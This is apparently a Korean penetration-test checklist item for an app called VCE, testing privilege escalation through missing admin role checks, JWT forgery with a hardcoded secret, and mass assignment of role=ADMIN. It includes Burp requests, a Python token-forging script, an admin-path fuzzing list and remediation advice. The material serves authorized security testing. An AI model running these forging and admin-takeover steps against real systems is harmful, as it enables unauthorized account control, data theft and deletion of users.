================================================================================
[VCE-EX-19] 일반 계정 권한 상승 가능성
도메인: exchange
위험도: Critical
================================================================================

1. 진단 항목 개요
--------------------------------------------------------------------------------
일반 사용자 계정이 관리자(ADMIN) 전용 엔드포인트에 접근하거나, 토큰 위조를 통해
권한을 상승시킬 수 있는지 검증한다.
VCE 시스템은 Spring Security + JWT 기반 인증을 사용하며, JwtTokenProvider.java:18에
JWT 시크릿 키가 하드코딩되어 있는 것으로 확인된다. 공격자가 해당 시크릿 키를
획득하면 임의의 ADMIN role 토큰을 위조할 수 있다.

위험도가 Critical인 이유:
- 공격자가 관리자 권한을 획득하면 전체 사용자 계정 제어 가능
- 사용자 상태 변경(정지/활성화), 포인트 조작, 시스템 설정 변경 가능
- 금융 거래 조작 및 데이터 유출 가능성


2. 대상 기능 & 엔드포인트
--------------------------------------------------------------------------------
주요 대상:
  - GET    /api/admin/members              (전체 회원 목록 조회)
  - GET    /api/admin/members/{id}         (특정 회원 정보 조회)
  - PUT    /api/admin/members/{id}/status  (회원 상태 변경)
  - GET    /api/admin/orders               (전체 주문 목록)
  - GET    /api/admin/dashboard            (관리자 대시보드)
  - DELETE /api/admin/members/{id}         (회원 삭제)
  - POST   /api/admin/notices              (공지사항 등록)

테스트 계정:
  - 일반 계정: test@vce.com / test1234
  - 관리자 계정: admin@vce.com / admin1234 (비교용)

서버:
  - 로컬: http://localhost:8080
  - 운영: https://vceapp.com


3. 취약점 원리 (Why this works)
--------------------------------------------------------------------------------
[시나리오 A] 수평적/수직적 접근 제어 미흡
Spring Security 설정에서 /api/admin/** 경로에 대해 ADMIN role 확인이
누락되거나, @PreAuthorize 어노테이션이 빠진 경우 일반 JWT 토큰으로 접근 가능.

[시나리오 B] JWT 시크릿 하드코딩으로 인한 토큰 위조
JwtTokenProvider.java:18에 시크릿이 평문으로 고정되어 있으면, 공격자가
소스코드 노출(GitHub, 번들 파일 등)을 통해 시크릿을 획득한 뒤
role 클레임을 ADMIN으로 조작한 토큰을 생성할 수 있다.

  정상 JWT Payload:
  {
    "sub": "test@vce.com",
    "role": "USER",
    "iat": 1700000000,
    "exp": 1700086400
  }

  위조 JWT Payload:
  {
    "sub": "test@vce.com",
    "role": "ADMIN",
    "iat": 1700000000,
    "exp": 9999999999
  }

[시나리오 C] 요청 바디 role 파라미터 바인딩
회원가입 또는 프로필 수정 API가 @RequestBody로 전체 DTO를 바인딩할 때,
role 필드가 DTO에 포함되어 있으면 클라이언트에서 직접 role=ADMIN을 전송
가능한 대량 할당(Mass Assignment) 취약점과 결합된다.


4. 테스트 절차 (Step-by-step)
--------------------------------------------------------------------------------

[STEP 1] 일반 계정 로그인 및 토큰 획득

Burp Suite Request:
----------
POST /api/auth/login HTTP/1.1
Host: localhost:8080
Content-Type: application/json

{
  "email": "test@vce.com",
  "password": "test1234"
}
----------

응답에서 accessToken 값 복사 (이하 USER_TOKEN).


[STEP 2] 일반 토큰으로 ADMIN 엔드포인트 직접 접근

Burp Suite Request:
----------
GET /api/admin/members HTTP/1.1
Host: localhost:8080
Authorization: Bearer <USER_TOKEN>
----------

판단: 200 OK 응답 시 → 접근 제어 미흡 (즉시 취약)
      403 Forbidden 응답 시 → Role 검증 정상


[STEP 3] JWT 시크릿 수집 시도

3-1. 프론트엔드 번들 파일에서 시크릿 검색:
     브라우저 → http://localhost:5173 접속
     개발자 도구 → Sources → bundle.js 검색
     Ctrl+F: "secret", "jwt", "JWT_SECRET", "jwtSecret"

3-2. GitHub 소스 코드 직접 확인:
     JwtTokenProvider.java 내 다음 패턴 검색:
     private static final String SECRET = "...";
     @Value("${jwt.secret}") 가 아닌 하드코딩 여부 확인

3-3. /actuator/env 엔드포인트:
----------
GET /api/actuator/env HTTP/1.1
Host: localhost:8080
Authorization: Bearer <USER_TOKEN>
----------


[STEP 4] 하드코딩 시크릿으로 ADMIN JWT 위조

시크릿 키를 획득한 경우 jwt.io 또는 Python으로 토큰 위조:

Python 예시:
----------
import jwt
import datetime

secret = "vce-secret-key-hardcoded"  # JwtTokenProvider.java:18에서 추출

payload = {
    "sub": "test@vce.com",
    "role": "ADMIN",
    "iat": datetime.datetime.utcnow(),
    "exp": datetime.datetime.utcnow() + datetime.timedelta(days=365)
}

forged_token = jwt.encode(payload, secret, algorithm="HS256")
print(forged_token)
----------

jwt.io 활용:
  1. https://jwt.io 접속
  2. 기존 USER_TOKEN 붙여넣기
  3. Payload에서 "role": "USER" → "role": "ADMIN" 변경
  4. Verify Signature 섹션에 시크릿 입력
  5. 생성된 토큰 복사 (이하 FORGED_ADMIN_TOKEN)


[STEP 5] 위조 토큰으로 ADMIN API 호출

Burp Suite Request:
----------
GET /api/admin/members HTTP/1.1
Host: localhost:8080
Authorization: Bearer <FORGED_ADMIN_TOKEN>
----------

----------
PUT /api/admin/members/2/status HTTP/1.1
Host: localhost:8080
Authorization: Bearer <FORGED_ADMIN_TOKEN>
Content-Type: application/json

{
  "status": "BANNED"
}
----------

----------
DELETE /api/admin/members/3 HTTP/1.1
Host: localhost:8080
Authorization: Bearer <FORGED_ADMIN_TOKEN>
----------


[STEP 6] role 파라미터 직접 주입 (Mass Assignment)

회원가입 API에 role 파라미터 추가 전송:
----------
POST /api/auth/register HTTP/1.1
Host: localhost:8080
Content-Type: application/json

{
  "email": "attacker@vce.com",
  "password": "attack1234",
  "name": "공격자",
  "role": "ADMIN"
}
----------

가입 후 로그인하여 발급된 토큰의 Payload 확인:
  - role 클레임이 ADMIN이면 → 대량 할당 취약점 확인


[STEP 7] Burp Suite Intruder를 이용한 ADMIN 경로 퍼징

Admin 경로 목록 파일 작성 후 Intruder로 자동화:
----------
GET /api/admin/§path§ HTTP/1.1
Host: localhost:8080
Authorization: Bearer <USER_TOKEN>
----------

페이로드 목록:
  members
  users
  dashboard
  orders
  settings
  config
  logs
  reports
  notices
  coins
  transactions
  deposits
  withdrawals
  roles
  permissions


5. 취약 여부 판단 기준
--------------------------------------------------------------------------------

취약 (Vulnerable):
  - [STEP 2] 일반 USER 토큰으로 /api/admin/** 접근 시 200 OK 응답
  - [STEP 4] JWT 시크릿이 소스코드/번들에서 평문으로 발견됨
  - [STEP 5] 위조된 ADMIN 토큰으로 관리자 API 정상 호출 성공
  - [STEP 6] 회원가입 시 role=ADMIN 설정이 실제 DB에 반영됨
  - 관리자 페이지(/admin) 접근 시 인증 없이 로드됨

안전 (Safe):
  - 일반 토큰으로 /api/admin/** 접근 시 403 Forbidden 반환
  - JWT 시크릿이 환경변수(@Value)로 주입되며 코드에 노출 없음
  - 위조 토큰 사용 시 서버에서 서명 검증 실패로 401 반환
  - 회원가입 DTO에서 role 필드 화이트리스트 제한


6. 예상 취약 포인트 (코드 위치)
--------------------------------------------------------------------------------

[JwtTokenProvider.java:18]
  private static final String SECRET_KEY = "vce-jwt-secret-2024";
  // 또는
  private String secretKey = "hardcoded-secret-value";

[SecurityConfig.java]
  .antMatchers("/api/admin/**").hasRole("ADMIN")  // 이 설정 누락 여부 확인
  // 또는 .permitAll()로 잘못 설정된 경우

[MemberController.java 또는 AdminController.java]
  @PostMapping("/api/admin/members/{id}/status")
  // @PreAuthorize("hasRole('ADMIN')") 어노테이션 누락 여부 확인

[MemberDto.java 또는 RegisterRequest.java]
  private String role;  // role 필드가 DTO에 노출된 경우


7. 권고 조치
--------------------------------------------------------------------------------

[즉시 조치]
1. JWT 시크릿 키 환경변수 분리:
   application.properties: jwt.secret=${JWT_SECRET}
   JwtTokenProvider.java: @Value("${jwt.secret}") private String secretKey;

2. 충분한 엔트로피의 시크릿 사용 (256비트 이상):
   openssl rand -base64 32

3. SecurityConfig.java에 명시적 ADMIN 권한 설정:
   .antMatchers("/api/admin/**").hasRole("ADMIN")

4. 각 ADMIN 컨트롤러 메서드에 @PreAuthorize 추가:
   @PreAuthorize("hasRole('ADMIN')")
   public ResponseEntity<?> getMembers() { ... }

5. 회원가입 DTO에서 role 필드 제거:
   DTO에서 role 필드를 제거하고, 서버에서 DEFAULT_ROLE = "USER"로 고정

6. JWT 알고리즘 강화 (RS256 또는 ES256 사용 권장):
   - 비대칭 키 알고리즘 사용 시 시크릿 탈취만으로 위조 불가

[모니터링]
- /api/admin/** 접근 로그 기록 및 이상 접근 알람 설정
- 짧은 시간 내 다수의 403 응답 발생 시 IP 차단
